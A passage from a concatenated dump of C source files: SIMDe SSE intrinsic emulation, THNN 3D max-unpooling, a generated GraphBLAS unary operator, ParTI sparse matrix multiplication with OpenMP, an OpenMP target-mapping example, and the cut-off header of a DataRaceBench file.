b_ = simde__m128_to_private(b);
int r;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_or_b_nan = vmvnq_u32(vandq_u32(a_not_nan, b_not_nan));
uint32x4_t a_le_b = vcleq_f32(a_.neon_f32, b_.neon_f32);
r = !!(vgetq_lane_u32(vorrq_u32(a_or_b_nan, a_le_b), 0) != 0);
#elif defined(SIMDE_HAVE_FENV_H)
fenv_t envp;
int x = feholdexcept(&envp);
r = a_.f32[0] <= b_.f32[0];
if (HEDLEY_LIKELY(x == 0))
fesetenv(&envp);
#else
r = a_.f32[0] <= b_.f32[0];
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_ucomile_ss(a, b) simde_mm_ucomile_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_ucomilt_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_ucomilt_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
int r;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_or_b_nan = vmvnq_u32(vandq_u32(a_not_nan, b_not_nan));
uint32x4_t a_lt_b = vcltq_f32(a_.neon_f32, b_.neon_f32);
r = !!(vgetq_lane_u32(vorrq_u32(a_or_b_nan, a_lt_b), 0) != 0);
#elif defined(SIMDE_HAVE_FENV_H)
fenv_t envp;
int x = feholdexcept(&envp);
r = a_.f32[0] < b_.f32[0];
if (HEDLEY_LIKELY(x == 0))
fesetenv(&envp);
#else
r = a_.f32[0] < b_.f32[0];
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_ucomilt_ss(a, b) simde_mm_ucomilt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_ucomineq_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_ucomineq_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
int r;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_and_b_not_nan = vandq_u32(a_not_nan, b_not_nan);
uint32x4_t a_neq_b = vmvnq_u32(vceqq_f32(a_.neon_f32, b_.neon_f32));
r = !!(vgetq_lane_u32(vandq_u32(a_and_b_not_nan, a_neq_b), 0) != 0);
#elif defined(SIMDE_HAVE_FENV_H)
fenv_t envp;
int x = feholdexcept(&envp);
r = a_.f32[0] != b_.f32[0];
if (HEDLEY_LIKELY(x == 0))
fesetenv(&envp);
#else
r = a_.f32[0] != b_.f32[0];
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_ucomineq_ss(a, b) simde_mm_ucomineq_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_unpackhi_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_unpackhi_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
r_.neon_f32 = vzip2q_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x2_t a1 = vget_high_f32(a_.neon_f32);
float32x2_t b1 = vget_high_f32(b_.neon_f32);
float32x2x2_t result = vzip_f32(a1, b1);
r_.neon_f32 = vcombine_f32(result.val[0], result.val[1]);
#elif defined(SIMDE_SHUFFLE_VECTOR_)
r_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, b_.f32, 2, 6, 3, 7);
#else
r_.f32[0] = a_.f32[2];
r_.f32[1] = b_.f32[2];
r_.f32[2] = a_.f32[3];
r_.f32[3] = b_.f32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_unpackhi_ps(a, b) simde_mm_unpackhi_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_unpacklo_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_unpacklo_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
r_.neon_f32 = vzip1q_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_mergeh(a_.altivec_f32, b_.altivec_f32);
#elif defined(SIMDE_SHUFFLE_VECTOR_)
r_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, b_.f32, 0, 4, 1, 5);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x2_t a1 = vget_low_f32(a_.neon_f32);
float32x2_t b1 = vget_low_f32(b_.neon_f32);
float32x2x2_t result = vzip_f32(a1, b1);
r_.neon_f32 = vcombine_f32(result.val[0], result.val[1]);
#else
r_.f32[0] = a_.f32[0];
r_.f32[1] = b_.f32[0];
r_.f32[2] = a_.f32[1];
r_.f32[3] = b_.f32[1];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_unpacklo_ps(a, b) simde_mm_unpacklo_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_stream_pi(simde__m64 *mem_addr, simde__m64 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
_mm_stream_pi(HEDLEY_REINTERPRET_CAST(__m64 *, mem_addr), a);
#else
simde__m64_private *dest = HEDLEY_REINTERPRET_CAST(simde__m64_private *,
mem_addr),
a_ = simde__m64_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
dest->i64[0] = vget_lane_s64(a_.neon_i64, 0);
#else
dest->i64[0] = a_.i64[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_stream_pi(mem_addr, a) simde_mm_stream_pi(mem_addr, (a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_stream_ps(simde_float32 mem_addr[4], simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_stream_ps(mem_addr, a);
#elif HEDLEY_HAS_BUILTIN(__builtin_nontemporal_store) && \
defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
simde__m128_private a_ = simde__m128_to_private(a);
__builtin_nontemporal_store(
a_.f32, SIMDE_ALIGN_CAST(__typeof__(a_.f32) *, mem_addr));
#else
simde_mm_store_ps(mem_addr, a);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_stream_ps(mem_addr, a) \
simde_mm_stream_ps(SIMDE_CHECKED_REINTERPRET_CAST( \
float *, simde_float32 *, mem_addr), \
(a))
#endif
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
#define SIMDE_MM_TRANSPOSE4_PS(row0, row1, row2, row3) \
do { \
float32x4x2_t ROW01 = vtrnq_f32(row0, row1); \
float32x4x2_t ROW23 = vtrnq_f32(row2, row3); \
row0 = vcombine_f32(vget_low_f32(ROW01.val[0]), \
vget_low_f32(ROW23.val[0])); \
row1 = vcombine_f32(vget_low_f32(ROW01.val[1]), \
vget_low_f32(ROW23.val[1])); \
row2 = vcombine_f32(vget_high_f32(ROW01.val[0]), \
vget_high_f32(ROW23.val[0])); \
row3 = vcombine_f32(vget_high_f32(ROW01.val[1]), \
vget_high_f32(ROW23.val[1])); \
} while (0)
#else
#define SIMDE_MM_TRANSPOSE4_PS(row0, row1, row2, row3) \
do { \
simde__m128 tmp3, tmp2, tmp1, tmp0; \
tmp0 = simde_mm_unpacklo_ps((row0), (row1)); \
tmp2 = simde_mm_unpacklo_ps((row2), (row3)); \
tmp1 = simde_mm_unpackhi_ps((row0), (row1)); \
tmp3 = simde_mm_unpackhi_ps((row2), (row3)); \
row0 = simde_mm_movelh_ps(tmp0, tmp2); \
row1 = simde_mm_movehl_ps(tmp2, tmp0); \
row2 = simde_mm_movelh_ps(tmp1, tmp3); \
row3 = simde_mm_movehl_ps(tmp3, tmp1); \
} while (0)
#endif
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _MM_TRANSPOSE4_PS(row0, row1, row2, row3) \
SIMDE_MM_TRANSPOSE4_PS(row0, row1, row2, row3)
#endif
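/* Usage sketch: treating row0..row3 as the rows of a 4x4 matrix,
   SIMDE_MM_TRANSPOSE4_PS(row0, row1, row2, row3) transposes them in place,
   so the element that started at lane j of row i ends up at lane i of row j
   (e.g. lane 2 of row1 moves to lane 1 of row2). */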
#if defined(_MM_EXCEPT_INVALID)
#define SIMDE_MM_EXCEPT_INVALID _MM_EXCEPT_INVALID
#else
#define SIMDE_MM_EXCEPT_INVALID (0x0001)
#endif
#if defined(_MM_EXCEPT_DENORM)
#define SIMDE_MM_EXCEPT_DENORM _MM_EXCEPT_DENORM
#else
#define SIMDE_MM_EXCEPT_DENORM (0x0002)
#endif
#if defined(_MM_EXCEPT_DIV_ZERO)
#define SIMDE_MM_EXCEPT_DIV_ZERO _MM_EXCEPT_DIV_ZERO
#else
#define SIMDE_MM_EXCEPT_DIV_ZERO (0x0004)
#endif
#if defined(_MM_EXCEPT_OVERFLOW)
#define SIMDE_MM_EXCEPT_OVERFLOW _MM_EXCEPT_OVERFLOW
#else
#define SIMDE_MM_EXCEPT_OVERFLOW (0x0008)
#endif
#if defined(_MM_EXCEPT_UNDERFLOW)
#define SIMDE_MM_EXCEPT_UNDERFLOW _MM_EXCEPT_UNDERFLOW
#else
#define SIMDE_MM_EXCEPT_UNDERFLOW (0x0010)
#endif
#if defined(_MM_EXCEPT_INEXACT)
#define SIMDE_MM_EXCEPT_INEXACT _MM_EXCEPT_INEXACT
#else
#define SIMDE_MM_EXCEPT_INEXACT (0x0020)
#endif
#if defined(_MM_EXCEPT_MASK)
#define SIMDE_MM_EXCEPT_MASK _MM_EXCEPT_MASK
#else
#define SIMDE_MM_EXCEPT_MASK \
(SIMDE_MM_EXCEPT_INVALID | SIMDE_MM_EXCEPT_DENORM | \
SIMDE_MM_EXCEPT_DIV_ZERO | SIMDE_MM_EXCEPT_OVERFLOW | \
SIMDE_MM_EXCEPT_UNDERFLOW | SIMDE_MM_EXCEPT_INEXACT)
#endif
#if defined(_MM_MASK_INVALID)
#define SIMDE_MM_MASK_INVALID _MM_MASK_INVALID
#else
#define SIMDE_MM_MASK_INVALID (0x0080)
#endif
#if defined(_MM_MASK_DENORM)
#define SIMDE_MM_MASK_DENORM _MM_MASK_DENORM
#else
#define SIMDE_MM_MASK_DENORM (0x0100)
#endif
#if defined(_MM_MASK_DIV_ZERO)
#define SIMDE_MM_MASK_DIV_ZERO _MM_MASK_DIV_ZERO
#else
#define SIMDE_MM_MASK_DIV_ZERO (0x0200)
#endif
#if defined(_MM_MASK_OVERFLOW)
#define SIMDE_MM_MASK_OVERFLOW _MM_MASK_OVERFLOW
#else
#define SIMDE_MM_MASK_OVERFLOW (0x0400)
#endif
#if defined(_MM_MASK_UNDERFLOW)
#define SIMDE_MM_MASK_UNDERFLOW _MM_MASK_UNDERFLOW
#else
#define SIMDE_MM_MASK_UNDERFLOW (0x0800)
#endif
#if defined(_MM_MASK_INEXACT)
#define SIMDE_MM_MASK_INEXACT _MM_MASK_INEXACT
#else
#define SIMDE_MM_MASK_INEXACT (0x1000)
#endif
#if defined(_MM_MASK_MASK)
#define SIMDE_MM_MASK_MASK _MM_MASK_MASK
#else
#define SIMDE_MM_MASK_MASK \
(SIMDE_MM_MASK_INVALID | SIMDE_MM_MASK_DENORM | \
SIMDE_MM_MASK_DIV_ZERO | SIMDE_MM_MASK_OVERFLOW | \
SIMDE_MM_MASK_UNDERFLOW | SIMDE_MM_MASK_INEXACT)
#endif
#if defined(_MM_FLUSH_ZERO_MASK)
#define SIMDE_MM_FLUSH_ZERO_MASK _MM_FLUSH_ZERO_MASK
#else
#define SIMDE_MM_FLUSH_ZERO_MASK (0x8000)
#endif
#if defined(_MM_FLUSH_ZERO_ON)
#define SIMDE_MM_FLUSH_ZERO_ON _MM_FLUSH_ZERO_ON
#else
#define SIMDE_MM_FLUSH_ZERO_ON (0x8000)
#endif
#if defined(_MM_FLUSH_ZERO_OFF)
#define SIMDE_MM_FLUSH_ZERO_OFF _MM_FLUSH_ZERO_OFF
#else
#define SIMDE_MM_FLUSH_ZERO_OFF (0x0000)
#endif
SIMDE_END_DECLS_
HEDLEY_DIAGNOSTIC_POP
#endif /* !defined(SIMDE_X86_SSE_H) */
|
VolumetricMaxUnpooling.c | #ifndef TH_GENERIC_FILE
#define TH_GENERIC_FILE "THNN/generic/VolumetricMaxUnpooling.c"
#else
static inline void THNN_(VolumetricMaxUnpooling_shapeCheck)(
THNNState *state,
THTensor *input,
THTensor *gradOutput,
THIndexTensor *indices,
int oT,
int oW,
int oH,
int dT,
int dW,
int dH,
int pT,
int pW,
int pH)
{
THNN_ARGCHECK(!input->is_empty() && (input->dim() == 4 || input->dim() == 5), 2, input,
"non-empty 4D or 5D (batch mode) tensor expected for input, but got: %s");
THNN_CHECK_SHAPE_INDICES(input, indices);
THArgCheck(dT > 0 && dW > 0 && dH > 0, 10,
"stride should be greater than zero, but got dT: %d dH: %d dW: %d",
dT, dH, dW);
int dimw = 3;
int dimh = 2;
int dimt = 1;
int dimn = 0;
if (input->dim() == 5)
{
dimt++;
dimw++;
dimh++;
dimn++;
}
int nslices = input->size(dimn);
if (gradOutput != NULL) {
if (oT != gradOutput->size(dimt) || oW != gradOutput->size(dimw) || oH != gradOutput->size(dimh))
{
THError(
"Inconsistent gradOutput size. oT= %d, oH= %d, oW= %d, gradOutput: %dx%dx%d",
oT, oH, oW, gradOutput->size(dimt), gradOutput->size(dimh), gradOutput->size(dimw)
);
}
THNN_CHECK_DIM_SIZE(gradOutput, input->dim(), dimn, nslices);
}
}
static void THNN_(VolumetricMaxUnpooling_updateOutput_frame)(
scalar_t *input_p,
scalar_t *output_p,
THIndex_t *ind_p,
int nslices,
int iT,
int iW,
int iH,
int oT,
int oW,
int oH)
{
int k;
int has_error = 0;
THIndex_t error_index = 0;
#pragma omp parallel for private(k)
for (k = 0; k < nslices; k++)
{
scalar_t *output_p_k = output_p + k * oT * oH * oW;
scalar_t *input_p_k = input_p + k * iT * iH * iW;
THIndex_t *ind_p_k = ind_p + k * iT * iH * iW;
int t, i, j, index;
THIndex_t maxp;
for (t = 0; t < iT; t++)
{
for (i = 0; i < iH; i++)
{
for (j = 0; j < iW; j++)
{
index = t * iH * iW + i * iW + j;
maxp = ind_p_k[index]; /* retrieve position of max */
if (maxp < 0 || maxp >= oT * oW * oH)
{
#pragma omp critical
{
has_error = 1;
error_index = maxp;
}
} else {
output_p_k[maxp] = input_p_k[index]; /* update output */
}
}
}
}
}
if (has_error) {
THError(
"found an invalid max index %ld (output volumes are of size %dx%dx%d)",
error_index, oT, oH, oW
);
}
}
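/* Index-layout note (illustrative numbers): each slice k is a flat T*H*W
   volume, so the input offset is t*iH*iW + i*iW + j and the stored index
   maxp addresses the oT*oH*oW output slab of the same slice; e.g. with
   oT = oH = oW = 2, maxp == 5 names output position (t=1, i=0, j=1). */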
void THNN_(VolumetricMaxUnpooling_updateOutput)(
THNNState *state,
THTensor *input,
THTensor *output,
THIndexTensor *indices,
int oT,
int oW,
int oH,
int dT,
int dW,
int dH,
int pT,
int pW,
int pH)
{
int dimw = 3;
int dimh = 2;
int dimt = 1;
int nbatch = 1;
int nslices;
int iT;
int iH;
int iW;
scalar_t *input_data;
scalar_t *output_data;
THIndex_t *indices_data;
THNN_(VolumetricMaxUnpooling_shapeCheck)(
state, input, NULL, indices,
oT, oW, oH, dT, dW, dH, pT, pW, pH);
if (input->dim() == 5)
{
nbatch = input->size(0);
dimt++;
dimw++;
dimh++;
}
/* sizes */
nslices = input->size(dimt-1);
iT = input->size(dimt);
iH = input->size(dimh);
iW = input->size(dimw);
/* get contiguous input */
input = THTensor_(newContiguous)(input);
indices = THIndexTensor_(newContiguous)(indices);
/* resize output */
if (input->dim() == 4)
{
THTensor_(resize4d)(output, nslices, oT, oH, oW);
THTensor_(zero)(output);
input_data = input->data<scalar_t>();
output_data = output->data<scalar_t>();
indices_data = THIndexTensor_(data)(indices);
THNN_(VolumetricMaxUnpooling_updateOutput_frame)(
input_data, output_data,
indices_data,
nslices,
iT, iW, iH,
oT, oW, oH
);
}
else
{
int p;
THTensor_(resize5d)(output, nbatch, nslices, oT, oH, oW);
THTensor_(zero)(output);
input_data = input->data<scalar_t>();
output_data = output->data<scalar_t>();
indices_data = THIndexTensor_(data)(indices);
for (p = 0; p < nbatch; p++)
{
THNN_(VolumetricMaxUnpooling_updateOutput_frame)(
input_data+p*nslices*iT*iW*iH,
output_data+p*nslices*oT*oW*oH,
indices_data+p*nslices*iT*iW*iH,
nslices,
iT, iW, iH,
oT, oW, oH
);
}
}
/* cleanup */
c10::raw::intrusive_ptr::decref(input);
THIndexTensor_(free)(indices);
}
static void THNN_(VolumetricMaxUnpooling_updateGradInput_frame)(
scalar_t *gradInput_p,
scalar_t *gradOutput_p,
THIndex_t *ind_p,
int nslices,
int iT,
int iW,
int iH,
int oT,
int oW,
int oH)
{
int k;
#pragma omp parallel for private(k)
for (k = 0; k < nslices; k++)
{
scalar_t *gradInput_p_k = gradInput_p + k * iT * iH * iW;
scalar_t *gradOutput_p_k = gradOutput_p + k * oT * oH * oW;
THIndex_t *ind_p_k = ind_p + k * iT * iH * iW;
int t, i, j, index;
THIndex_t maxp;
for (t = 0; t < iT; t++)
{
for (i = 0; i < iH; i++)
{
for (j = 0; j < iW; j++)
{
index = t * iH * iW + i * iW + j;
maxp = ind_p_k[index]; /* retrieve position of max */
if (maxp < 0 || maxp >= oT * oH * oW)
{
THError("invalid max index %ld, oT= %d, oW= %d, oH= %d", maxp, oT, oW, oH);
}
gradInput_p_k[index] = gradOutput_p_k[maxp]; /* update gradient */
}
}
}
}
}
void THNN_(VolumetricMaxUnpooling_updateGradInput)(
THNNState *state,
THTensor *input,
THTensor *gradOutput,
THTensor *gradInput,
THIndexTensor *indices,
int oT,
int oW,
int oH,
int dT,
int dW,
int dH,
int pT,
int pW,
int pH)
{
int dimw = 3;
int dimh = 2;
int dimt = 1;
int nbatch = 1;
int nslices;
int iT;
int iH;
int iW;
scalar_t *gradInput_data;
scalar_t *gradOutput_data;
THIndex_t *indices_data;
THNN_(VolumetricMaxUnpooling_shapeCheck)(
state, input, gradOutput, indices,
oT, oW, oH, dT, dW, dH, pT, pW, pH);
// TODO: check gradOutput shape
/* get contiguous gradOutput */
gradOutput = THTensor_(newContiguous)(gradOutput);
indices = THIndexTensor_(newContiguous)(indices);
/* resize */
THTensor_(resizeAs)(gradInput, input);
THTensor_(zero)(gradInput);
if (input->dim() == 5)
{
nbatch = input->size(0);
dimt++;
dimw++;
dimh++;
}
/* sizes */
nslices = input->size(dimt-1);
iT = input->size(dimt);
iH = input->size(dimh);
iW = input->size(dimw);
/* get raw pointers */
gradInput_data = gradInput->data<scalar_t>();
gradOutput_data = gradOutput->data<scalar_t>();
indices_data = THIndexTensor_(data)(indices);
/* backprop */
if (input->dim() == 4)
{
THNN_(VolumetricMaxUnpooling_updateGradInput_frame)(
gradInput_data, gradOutput_data,
indices_data,
nslices,
iT, iW, iH,
oT, oW, oH
);
}
else
{
int p;
for (p = 0; p < nbatch; p++)
{
THNN_(VolumetricMaxUnpooling_updateGradInput_frame)(
gradInput_data+p*nslices*iT*iW*iH,
gradOutput_data+p*nslices*oT*oW*oH,
indices_data+p*nslices*iT*iW*iH,
nslices,
iT, iW, iH,
oT, oW, oH
);
}
}
/* cleanup */
c10::raw::intrusive_ptr::decref(gradOutput);
THIndexTensor_(free)(indices);
}
#endif
|
GB_unaryop__abs_uint64_bool.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2019, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__abs_uint64_bool
// op(A') function: GB_tran__abs_uint64_bool
// C type: uint64_t
// A type: bool
// cast: uint64_t cij = (uint64_t) aij
// unaryop: cij = aij
#define GB_ATYPE \
bool
#define GB_CTYPE \
uint64_t
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
bool aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = x ;
// casting
#define GB_CASTING(z, x) \
uint64_t z = (uint64_t) x ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (x, aij) ; \
GB_OP (GB_CX (pC), x) ; \
}
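// Expansion sketch (illustrative): for this operator, GB_CAST_OP (p, p)
// unfolds to
//     bool aij = Ax [p] ;
//     uint64_t x = (uint64_t) aij ;
//     Cx [p] = x ;
// so the "abs" of a bool is simply the 0/1 value widened to uint64_t.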
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_ABS || GxB_NO_UINT64 || GxB_NO_BOOL)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__abs_uint64_bool
(
uint64_t *restrict Cx,
const bool *restrict Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (int64_t p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__abs_uint64_bool
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *restrict *Rowcounts,
GBI_single_iterator Iter,
const int64_t *restrict A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
mmul.c | /*
This file is part of ParTI!.
ParTI! is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
ParTI! is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with ParTI!.
If not, see <http://www.gnu.org/licenses/>.
*/
#include <HiParTI.h>
#include <stdio.h>
/**
* SpMM, C = AB, A is sparse, B, C are dense
*/
int ptiSparseMatrixMulMatrix(ptiMatrix * C, const ptiSparseMatrix *spA, ptiMatrix * B)
{
for(ptiNnzIndex z = 0; z < spA->nnz; ++z) {
ptiIndex row = spA->rowind.data[z]; // C[row,:]
ptiIndex col = spA->colind.data[z]; // B[col,:]
ptiValue val = spA->values.data[z];
        for(ptiIndex c = 0; c < B->ncols; ++c) {
C->values[row * C->stride + c] += val * B->values[col * B->stride + c];
}
}
return 0;
}
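/* Worked example (hypothetical 2x2 inputs): if A holds the COO triplets
 * (0,1,2.0) and (1,0,3.0) and B = [[1,2],[3,4]], the scatter loop computes
 * C[0,:] += 2.0 * B[1,:] = {6, 8} and C[1,:] += 3.0 * B[0,:] = {3, 6};
 * every nonzero A(r,c) adds val times row c of B into row r of C, assuming
 * the caller zero-initialized C. */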
#ifdef HIPARTI_USE_OPENMP
int ptiOmpSparseMatrixMulMatrix(ptiMatrix * C, const ptiSparseMatrix *spA, ptiMatrix * B)
{
#pragma omp parallel for // schedule(static)
for(ptiNnzIndex z = 0; z < spA->nnz; ++z) {
ptiIndex row = spA->rowind.data[z]; // C[row,:]
ptiIndex col = spA->colind.data[z]; // B[col,:]
ptiValue val = spA->values.data[z];
ptiValue * restrict cval_row = C->values + row * C->stride;
for(ptiIndex c = 0; c < B->ncols; ++c) {
#pragma omp atomic update
cval_row[c] += val * B->values[col * B->stride + c];
// C->values[row * C->stride+c] += val * B->values[col * B->stride + c]; // slower
}
}
return 0;
}
int ptiOmpSparseMatrixMulMatrix_Reduce(ptiMatrix * C, ptiMatrix * Cbufs, const ptiSparseMatrix *spA, ptiMatrix * B)
{
int nthreads;
    #pragma omp parallel
    #pragma omp master
    nthreads = omp_get_num_threads(); /* let one thread record the team size */
#pragma omp parallel for // schedule(static)
for(ptiNnzIndex z = 0; z < spA->nnz; ++z) {
int tid = omp_get_thread_num();
ptiIndex row = spA->rowind.data[z]; // C[row,:]
ptiIndex col = spA->colind.data[z]; // B[col,:]
ptiValue val = spA->values.data[z];
#pragma omp simd
for(ptiIndex c = 0; c < B->ncols; ++c) {
            Cbufs[tid].values[row * C->stride + c] += val * B->values[col * B->stride + c]; // accumulate into this thread's private buffer
}
}
/* Reduction */
#pragma omp parallel for schedule(static)
for(ptiIndex r=0; r<C->nrows; ++r) {
for(int t=0; t<nthreads; ++t) {
#pragma omp simd
for(ptiIndex c = 0; c < C->ncols; ++c) {
C->values[r * C->stride + c] += Cbufs[t].values[r * C->stride + c];
}
}
}
return 0;
}
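/* Design note: the atomic variant above serializes only colliding C[row,:]
 * updates (two nonzeros in the same row may be scattered by different
 * threads), whereas this variant gives each thread a private Cbuf and pays
 * an extra O(nrows * ncols * nthreads) reduction pass instead -- a
 * memory-for-atomics trade that helps when rows are heavily shared. */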
#endif
|
Example_target_ptr_map.3b.c | /*
* @@name: target_ptr_map.3b.c
* @@type: C
* @@compilable: yes
* @@linkable: no
* @@expect: success
* @@version: omp_5.0
*/
#define N 100
int x[N], y[N];
#pragma omp declare target
int *p1;
#pragma omp end declare target
int *p2;
int foo()
{
p1 = &x[0];
p2 = &y[0];
// Explicitly map array section y[:N]
#pragma omp target enter data map(y[:N])
#pragma omp target map(x[:N]) map(p1[:N]) map(p2[:0])
{
// Accessing the mapped arrays x,y is OK here.
x[0] = 1;
y[1] = 2;
// Pointer attachment for p1 occurs here when array x is mapped
// on the target construct (as p1 = &x[0] on the device)
p1[0] = 3; // accessing p1 is OK
// p2 in the target region is initialized to &y[0]
p2[1] = 4; // accessing p2 is OK
}
return 0;
}
|
DRB097-target-teams-distribute-orig-no.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <stdio.h>
#define min(x, y) (((x) < (y)) ? (x) : (y))
/*
use of omp target + teams + distribute + parallel for
(as dumped here, the listing is a source-to-source transformed variant: the
